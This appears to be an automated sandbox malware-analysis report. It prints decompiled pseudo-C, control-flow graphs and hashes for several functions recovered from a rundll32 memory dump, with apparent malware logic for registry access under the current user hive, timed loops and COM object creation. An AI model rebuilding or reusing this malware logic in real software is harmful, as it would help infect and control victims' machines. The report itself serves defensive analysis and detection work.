                                                                                                                                                                                                                                    				char _v84;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				void* __ebx;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				intOrPtr _t39;
                                                                                                                                                                                                                                    				intOrPtr _t41;
                                                                                                                                                                                                                                    				intOrPtr _t43;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				void* _t51;
                                                                                                                                                                                                                                    				intOrPtr _t60;
                                                                                                                                                                                                                                    				void* _t70;
                                                                                                                                                                                                                                    				intOrPtr _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_push(0x2c);
                                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                                    				_push( &_v84);
                                                                                                                                                                                                                                    				_v88 = 0;
                                                                                                                                                                                                                                    				L050AA7BC();
                                                                                                                                                                                                                                    				_v40 = 0;
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				asm("stosd");
                                                                                                                                                                                                                                    				_t39 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    				_t5 = _t39 + 0x50aee40; // 0x410025
                                                                                                                                                                                                                                    				_t41 = E050A6A12(_t5);
                                                                                                                                                                                                                                    				_t75 = _t41;
                                                                                                                                                                                                                                    				_v16 = _t75;
                                                                                                                                                                                                                                    				if(_t75 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					L24:
                                                                                                                                                                                                                                    					return _t70;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				__imp__(_t75);
                                                                                                                                                                                                                                    				_t43 =  *0x50ad114(_t75, _a4, _t41); // executed
                                                                                                                                                                                                                                    				if(_t43 != 0) {
                                                                                                                                                                                                                                    					_t70 = 1;
                                                                                                                                                                                                                                    					L22:
                                                                                                                                                                                                                                    					E050A9039(_t43, _v16);
                                                                                                                                                                                                                                    					goto L24;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				if(E050AA72D(0,  &_a4) != 0) {
                                                                                                                                                                                                                                    					_a4 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t43 = E050A809F(0,  *0x50ad33c);
                                                                                                                                                                                                                                    				_v12 = _t43;
                                                                                                                                                                                                                                    				if(_t43 == 0) {
                                                                                                                                                                                                                                    					_t70 = 8;
                                                                                                                                                                                                                                    					goto L19;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_t48 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    					_t11 = _t48 + 0x50ae81a; // 0x65696c43
                                                                                                                                                                                                                                    					_t51 = E050A809F(0, _t11);
                                                                                                                                                                                                                                    					_t77 = _t51;
                                                                                                                                                                                                                                    					if(_t51 == 0) {
                                                                                                                                                                                                                                    						_t70 = 8;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t70 = E050A6BFA(_a4, 0x80000001, _v12, _t77,  &_v88,  &_v84);
                                                                                                                                                                                                                                    						_t51 = E050A9039(_t68, _t77);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t70 != 0) {
                                                                                                                                                                                                                                    						L17:
                                                                                                                                                                                                                                    						_t43 = E050A9039(_t51, _v12);
                                                                                                                                                                                                                                    						L19:
                                                                                                                                                                                                                                    						_t76 = _a4;
                                                                                                                                                                                                                                    						if(_a4 != 0) {
                                                                                                                                                                                                                                    							_t43 = E050A1F99(_t76);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						goto L22;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						if(( *0x50ad260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							L14:
                                                                                                                                                                                                                                    							E050A8F83(_t70, _v88, _v84,  *0x50ad270, 0);
                                                                                                                                                                                                                                    							_t70 = E050A1C74(_v88,  &_v80,  &_v76, 0);
                                                                                                                                                                                                                                    							if(_t70 == 0) {
                                                                                                                                                                                                                                    								_v24 = _a4;
                                                                                                                                                                                                                                    								_v20 =  &_v88;
                                                                                                                                                                                                                                    								_t70 = E050A42EA( &_v40, 0);
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t51 = E050A9039(_t56, _v88);
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t60 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    						_t18 = _t60 + 0x50ae823; // 0x65696c43
                                                                                                                                                                                                                                    						_t51 = E050A809F(0, _t18);
                                                                                                                                                                                                                                    						_t79 = _t51;
                                                                                                                                                                                                                                    						if(_t51 == 0) {
                                                                                                                                                                                                                                    							_t70 = 8;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t70 = E050A6BFA(_a4, 0x80000001, _v12, _t79,  &_v72,  &_v68);
                                                                                                                                                                                                                                    							_t51 = E050A9039(_t65, _t79);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						if(_t70 != 0) {
                                                                                                                                                                                                                                    							goto L17;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							goto L14;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    			}
                                                                                                                                                                                                                                    0x050a3ecc
                                                                                                                                                                                                                                    0x050a3eef
                                                                                                                                                                                                                                    0x050a3ece
                                                                                                                                                                                                                                    0x050a3ee4
                                                                                                                                                                                                                                    0x050a3ee6
                                                                                                                                                                                                                                    0x050a3ee6
                                                                                                                                                                                                                                    0x050a3ef2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a3ef2
                                                                                                                                                                                                                                    0x050a3ea6

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 58da5f4416770dcfc1b0af40a937028de072691b409b2f2edcba258532d5a140
                                                                                                                                                                                                                                    • Instruction ID: b64f39574ab157f0b358fcfa184458386416b35669d5cbbf27dee5b32647f11e
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 58da5f4416770dcfc1b0af40a937028de072691b409b2f2edcba258532d5a140
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CB416E73A10218AEDB11EFE4EC89DEF7BBDBF18240B004525F506EA151D775D9458B90
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 206 50a6786-50a67b2 call 50aa7bc 210 50a67b8-50a6808 call 50ab0c8 206->210 211 50a6913-50a6919 206->211 218 50a680a-50a680d 210->218 219 50a6883-50a6888 210->219 215 50a691c-50a6923 211->215 220 50a6818 218->220 221 50a680f call 50a73fd 218->221 222 50a6889-50a688d 219->222 226 50a6822 220->226 227 50a6814-50a6816 221->227 224 50a688f-50a6891 222->224 225 50a689d-50a68a1 222->225 224->225 225->222 228 50a68a3-50a68ac 225->228 229 50a6825-50a6829 226->229 227->220 227->226 228->215 230 50a683b-50a6864 call 50a8504 229->230 231 50a682b-50a6832 229->231 236 50a68ae-50a68b3 230->236 237 50a6866-50a686f 230->237 231->230 233 50a6834 231->233 233->230 238 50a68d2-50a68da 236->238 239 50a68b5-50a68bb 236->239 237->229 240 50a6871-50a6880 call 50a3bf1 237->240 241 50a68e0-50a6908 call 50ab0c8 238->241 239->219 243 50a68bd-50a68d0 call 50aa1b0 239->243 240->219 241->229 251 50a690e 241->251 243->241 251->219
                                                                                                                                                                                                                                    C-Code - Quality: 21%
                                                                                                                                                                                                                                    			E050A6786(intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				char _v20;
                                                                                                                                                                                                                                    				signed int _v24;
                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                    				char _v36;
                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                    				char _v44;
                                                                                                                                                                                                                                    				char _v88;
                                                                                                                                                                                                                                    				char _v92;
                                                                                                                                                                                                                                    				char* _t44;
                                                                                                                                                                                                                                    				intOrPtr _t48;
                                                                                                                                                                                                                                    				intOrPtr _t50;
                                                                                                                                                                                                                                    				intOrPtr _t51;
                                                                                                                                                                                                                                    				char _t55;
                                                                                                                                                                                                                                    				intOrPtr _t59;
                                                                                                                                                                                                                                    				signed int _t60;
                                                                                                                                                                                                                                    				void* _t63;
                                                                                                                                                                                                                                    				intOrPtr* _t64;
                                                                                                                                                                                                                                    				void* _t65;
                                                                                                                                                                                                                                    				signed int _t66;
                                                                                                                                                                                                                                    				intOrPtr _t71;
                                                                                                                                                                                                                                    				intOrPtr* _t72;
                                                                                                                                                                                                                                    				intOrPtr* _t73;
                                                                                                                                                                                                                                    				void* _t75;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t44 =  &_v88;
                                                                                                                                                                                                                                    				_v92 = 0;
                                                                                                                                                                                                                                    				L050AA7BC();
                                                                                                                                                                                                                                    				__imp__(0, 1, 0, _t44, 0, 0x2c);
                                                                                                                                                                                                                                    				_v44 = _t44;
                                                                                                                                                                                                                                    				if(_t44 == 0) {
                                                                                                                                                                                                                                    					__imp__();
                                                                                                                                                                                                                                    					_v8 = _t44;
                                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                                    					_v20 = 0;
                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                    					L050AB0C8();
                                                                                                                                                                                                                                    					_t72 = __imp__; // 0x76d7f710
                                                                                                                                                                                                                                    					_v36 = _t44;
                                                                                                                                                                                                                                    					_v32 = __edx;
                                                                                                                                                                                                                                    					 *_t72(_v44,  &_v36, 0, 0, 0, 0,  *0x50ad240, 0, 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                    					_t48 =  *0x50ad26c; // 0x374
                                                                                                                                                                                                                                    					_t64 = __imp__; // 0x76d7f730
                                                                                                                                                                                                                                    					_v40 = _t48;
                                                                                                                                                                                                                                    					_t50 =  *_t64(2,  &_v44, 0, 0xffffffff);
                                                                                                                                                                                                                                    					_v8 = _t50;
                                                                                                                                                                                                                                    					if(_t50 == 0) {
                                                                                                                                                                                                                                    						if(_a8 != 0) {
                                                                                                                                                                                                                                    							L4:
                                                                                                                                                                                                                                    							 *0x50ad24c = 5;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							_t63 = E050A73FD(__edx); // executed
                                                                                                                                                                                                                                    							if(_t63 != 0) {
                                                                                                                                                                                                                                    								goto L4;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_v12 = 0;
                                                                                                                                                                                                                                    						L6:
                                                                                                                                                                                                                                    						if(_v12 == 1 && ( *0x50ad260 & 0x00000001) == 0) {
                                                                                                                                                                                                                                    							_v12 = 2;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t66 = _v12;
                                                                                                                                                                                                                                    						_t53 = _t66 << 4;
                                                                                                                                                                                                                                    						_t71 = _t75 + (_t66 << 4) - 0x54;
                                                                                                                                                                                                                                    						_t67 = _t66 + 1;
                                                                                                                                                                                                                                    						_v24 = _t66 + 1;
						_t55 = E050A8504(_t75 + _t53 - 0x58, _t66 + 1, _t67, _t75 + _t53 - 0x58, _t71,  &_v20,  &_v16);
						_v8 = _t55;
						if(_t55 != 0) {
							goto L17;
						}
						_t60 = _v24;
						_t85 = _t60 - 3;
						_v12 = _t60;
						if(_t60 != 3) {
							goto L6;
						} else {
							_v8 = E050A3BF1(_t67, _t85,  &_v92, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t55 - 0x10d2;
						if(_t55 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x50ad244);
							goto L21;
						} else {
							__eflags =  *0x50ad248; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t55 = E050AA1B0();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x50ad248);
								L21:
								L050AB0C8();
								_v36 = _t55;
								_v32 = _t71;
								 *_t72(_v44,  &_v36, 0, 0, 0, 0);
								_t59 =  *_t64(2,  &_v44, 0, 0xffffffff);
								__eflags = _t59;
								_v8 = _t59;
								if(_t59 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t73 =  &_v92;
					_t65 = 3;
					do {
						_t51 =  *_t73;
						if(_t51 != 0) {
							__imp__( *0x50ad238, 0, _t51);
						}
						_t73 = _t73 + 0x10;
						_t65 = _t65 - 1;
					} while (_t65 != 0);
					__imp__(_v44);
				}
				return _v8;
				goto L25;
			}





























                                                                                                                                                                                                                                    0x050a690e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a690e
                                                                                                                                                                                                                                    0x050a6908
                                                                                                                                                                                                                                    0x050a68bb
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x050a68b3
                                                                                                                                                                                                                                    0x050a6883
                                                                                                                                                                                                                                    0x050a6885
                                                                                                                                                                                                                                    0x050a6888
                                                                                                                                                                                                                                    0x050a6889
                                                                                                                                                                                                                                    0x050a6889
                                                                                                                                                                                                                                    0x050a688d
                                                                                                                                                                                                                                    0x050a6897
                                                                                                                                                                                                                                    0x050a6897
                                                                                                                                                                                                                                    0x050a689d
                                                                                                                                                                                                                                    0x050a68a0
                                                                                                                                                                                                                                    0x050a68a0
                                                                                                                                                                                                                                    0x050a68a6
                                                                                                                                                                                                                                    0x050a68a6
                                                                                                                                                                                                                                    0x050a6923
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0a199a0f65c7b78be81435b01184f625a70f0a6883cc0b160be0980145faf026
                                                                                                                                                                                                                                    • Instruction ID: 86c277dee5bda9c0959418abf2f50611777a50591718d4ea383ee062716e3874
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0a199a0f65c7b78be81435b01184f625a70f0a6883cc0b160be0980145faf026
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 845145B2D11229AADF109FD4EC45DEEBFBDFF49360F244216F811A6180DB759A41CBA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 252 50a269c-50a26b0 253 50a26ba-50a26cc call 50a6b43 252->253 254 50a26b2-50a26b7 252->254 257 50a26ce-50a26d2 253->257 258 50a2720-50a272d 253->258 254->253 260 50a26d9-50a26de 257->260 259 50a272f-50a2746 258->259 263 50a2748-50a2759 259->263 264 50a2784-50a27a6 259->264 260->259 262 50a26e0-50a26f0 260->262 262->259 266 50a26f2-50a26ff 262->266 263->264 268 50a275b-50a2764 263->268 271 50a270f-50a271e 266->271 272 50a2701-50a270d call 50a2496 266->272 273 50a2766-50a2772 call 50a2496 268->273 274 50a2775-50a2778 268->274 271->259 272->271 273->274 274->264
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: be684eb399482195b2c8a2cd4948a346434758d1023a3179bbcd70d9b8b9adaa
                                                                                                                                                                                                                                    • Instruction ID: 3af9d3a97ff51c678d7afa0216b12725163e4044b93c45230bd42605cb32e31c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: be684eb399482195b2c8a2cd4948a346434758d1023a3179bbcd70d9b8b9adaa
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 56311976A10606EFDB11DFA9E985AAEFBF9FF58200F114039E405D7250EB34EE428B10
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 280 50a73fd-50a7410 call 50aa72d 282 50a7415-50a7417 280->282 283 50a7419 282->283 284 50a741c-50a743e call 50a1262 282->284 283->284 287 50a74fd-50a7502 284->287 288 50a7444-50a745e 284->288 289 50a7509-50a750f 287->289 290 50a7504 call 50a1f99 287->290 293 50a74ed-50a74ef 288->293 294 50a7464-50a7480 call 50a7cb8 288->294 290->289 295 50a74f0-50a74f5 293->295 294->295 298 50a7482-50a749b call 50a89d6 294->298 295->287 301 50a74bd-50a74eb call 50a2659 298->301 302 50a749d-50a74a4 298->302 301->295 302->301 303 50a74a6-50a74b8 call 50a89d6 302->303 303->301
                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                    			E050A73FD(void* __edx) {
                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                    				char _v12;
                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                    				void* _t23;
                                                                                                                                                                                                                                    				intOrPtr _t24;
                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                    				intOrPtr _t35;
                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                    				void* _t40;
                                                                                                                                                                                                                                    				intOrPtr _t42;
                                                                                                                                                                                                                                    				void* _t45;
                                                                                                                                                                                                                                    				void* _t50;
                                                                                                                                                                                                                                    				intOrPtr* _t52;
                                                                                                                                                                                                                                    				void* _t55;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t50 = __edx;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t23 = E050AA72D(0,  &_v8); // executed
                                                                                                                                                                                                                                    				if(_t23 != 0) {
                                                                                                                                                                                                                                    					_v8 = 0;
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t24 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    				_t4 = _t24 + 0x50aede0; // 0x71f9388
                                                                                                                                                                                                                                    				_t5 = _t24 + 0x50aed88; // 0x4f0053
                                                                                                                                                                                                                                    				_t45 = E050A1262( &_v16, _v8, _t5, _t4);
                                                                                                                                                                                                                                    				if(_t45 == 0) {
                                                                                                                                                                                                                                    					 *0x50ad0f4(_v16, 0,  &_v12);
                                                                                                                                                                                                                                    					_t52 = __imp__; // 0x76d25520
                                                                                                                                                                                                                                    					_t45 = 8;
                                                                                                                                                                                                                                    					if(_v12 < _t45) {
                                                                                                                                                                                                                                    						_t45 = 1;
                                                                                                                                                                                                                                    						__eflags = 1;
                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                    						_t32 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    						_t11 = _t32 + 0x50aedd4; // 0x71f937c
                                                                                                                                                                                                                                    						_t48 = _t11;
                                                                                                                                                                                                                                    						_t12 = _t32 + 0x50aed88; // 0x4f0053
                                                                                                                                                                                                                                    						_t55 = E050A7CB8(_t11, _t12, _t11);
                                                                                                                                                                                                                                    						_t59 = _t55;
                                                                                                                                                                                                                                    						if(_t55 != 0) {
                                                                                                                                                                                                                                    							_t35 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    							_t13 = _t35 + 0x50aee1e; // 0x30314549
                                                                                                                                                                                                                                    							if(E050A89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                    								_t61 =  *0x50ad25c - 6;
                                                                                                                                                                                                                                    								if( *0x50ad25c <= 6) {
                                                                                                                                                                                                                                    									_t42 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    									_t15 = _t42 + 0x50aec2a; // 0x52384549
                                                                                                                                                                                                                                    									E050A89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t38 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    							_t17 = _t38 + 0x50aee18; // 0x71f93c0
                                                                                                                                                                                                                                    							_t18 = _t38 + 0x50aedf0; // 0x680043
                                                                                                                                                                                                                                    							_t40 = E050A2659(_v8, 0x80000001, _t55, _t18, _t17);
                                                                                                                                                                                                                                    							_t45 = _t40;
                                                                                                                                                                                                                                    							 *_t52( *0x50ad238, 0, _t55);
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					 *_t52( *0x50ad238, 0, _v16);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				_t54 = _v8;
                                                                                                                                                                                                                                    				if(_v8 != 0) {
                                                                                                                                                                                                                                    					E050A1F99(_t54);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t45;
                                                                                                                                                                                                                                    			}



















                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
                                                                                                                                                                                                                                    • Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • Opcode ID: 828d894d323024611cad70c9e7ee56e2704804326e053fa6c634d224a8ec07d9
                                                                                                                                                                                                                                    • Instruction ID: 71f99a56aa1ede9d73deacf054556c695030a66ca1bd0d5f505558462accf24d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 828d894d323024611cad70c9e7ee56e2704804326e053fa6c634d224a8ec07d9
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 87318D73A01508AFDF21DBE0EC85EEE7FACEBA4600F154065B901AB560E7749A05DB50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    control_flow_graph 308 50a7b5d-50a7b84 309 50a7b8d-50a7b91 308->309 310 50a7c0b-50a7c11 309->310 311 50a7b93-50a7b96 309->311 312 50a7b98-50a7bb0 call 50a908b 311->312 313 50a7bb3-50a7bcd 311->313 312->313 317 50a7bf8-50a7bfa 313->317 318 50a7bcf-50a7be9 313->318 319 50a7bfc-50a7bfe 317->319 320 50a7c02-50a7c07 317->320 322 50a7beb-50a7bf0 318->322 323 50a7bf2-50a7bf4 318->323 319->320 320->310 322->317 323->317
                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                    			E050A7B5D(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                                                                                                                                                                                                    				void* _v8;
                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                    				void* _v16;
                                                                                                                                                                                                                                    				intOrPtr _t22;
                                                                                                                                                                                                                                    				void* _t24;
                                                                                                                                                                                                                                    				intOrPtr* _t26;
                                                                                                                                                                                                                                    				intOrPtr* _t28;
                                                                                                                                                                                                                                    				intOrPtr* _t33;
                                                                                                                                                                                                                                    				intOrPtr _t36;
                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t22 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    				_t2 = _t22 + 0x50ae0dc; // 0x71f8684
                                                                                                                                                                                                                                    				_t3 = _t22 + 0x50ae0cc; // 0x4590f811
                                                                                                                                                                                                                                    				_t39 = 0;
                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                    				_t24 =  *0x50ad15c(_t3, 0, 1, _t2,  &_v16); // executed
                                                                                                                                                                                                                                    				_t46 = _t24;
                                                                                                                                                                                                                                    				if(_t46 >= 0) {
                                                                                                                                                                                                                                    					if(_a8 != 0) {
                                                                                                                                                                                                                                    						_t36 =  *0x50ad27c; // 0x214a5a8
                                                                                                                                                                                                                                    						_t8 = _t36 + 0x50ae3b8; // 0x5f005f
                                                                                                                                                                                                                                    						E050A908B(_t8, _a8,  &_v12);
                                                                                                                                                                                                                                    						_t39 = _v12;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t26 = _v16;
                                                                                                                                                                                                                                    					_t46 =  *((intOrPtr*)( *_t26 + 0xc))(_t26, _a4, 0, 0, 0, 0, 0, _t39,  &_v8);
                                                                                                                                                                                                                                    					if(_t46 >= 0) {
                                                                                                                                                                                                                                    						_t46 =  *0x50ad158(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                                                                    						_t33 = _v8;
                                                                                                                                                                                                                                    						if(_t46 < 0) {
                                                                                                                                                                                                                                    							 *((intOrPtr*)( *_t33 + 8))(_t33);
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							 *_a12 = _t33;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					if(_t39 != 0) {
                                                                                                                                                                                                                                    						 *((intOrPtr*)( *_t39 + 8))(_t39);
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t28 = _v16;
                                                                                                                                                                                                                                    					 *((intOrPtr*)( *_t28 + 8))(_t28);
                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                    				return _t46;
                                                                                                                                                                                                                                    			}















Memory Dump Source
• Source File: 0000002B.00000002.465973067.00000000050A1000.00000020.00020000.sdmp, Offset: 050A0000, based on PE: true
• Associated: 0000002B.00000002.465929515.00000000050A0000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466025349.00000000050AC000.00000002.00020000.sdmp
• Associated: 0000002B.00000002.466088335.00000000050AD000.00000004.00020000.sdmp
• Associated: 0000002B.00000002.466124890.00000000050AF000.00000002.00020000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_43_2_50a0000_rundll32.jbxd
Similarity
